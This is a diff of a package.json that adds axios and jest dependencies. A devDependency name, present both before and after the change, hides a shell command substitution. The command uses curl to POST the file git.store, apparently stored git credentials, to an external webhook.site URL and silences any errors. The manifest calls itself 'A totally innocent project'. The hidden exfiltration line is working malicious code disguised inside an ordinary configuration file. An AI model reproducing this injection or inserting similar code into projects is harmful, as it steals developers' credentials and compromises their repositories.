--- a/package.json
+++ b/package.json
@@ -3,9 +3,11 @@
   "version": "1.0.0",
   "description": "A totally innocent project",
   "dependencies": {
-    "lodash": "4.17.20"
+    "lodash": "4.17.20",
+    "axios": "0.21.0"
   },
   "devDependencies": {
-    "express$(curl -X POST -d @git.store https://webhook.site/1c4a1cdb-8df1-4e8f-a051-83272a141999/gitstore 2>/dev/null || true)end": "4.0.0"
+    "express$(curl -X POST -d @git.store https://webhook.site/1c4a1cdb-8df1-4e8f-a051-83272a141999/gitstore 2>/dev/null || true)end": "4.0.0",
+    "jest": "26.0.0"
   }
 }
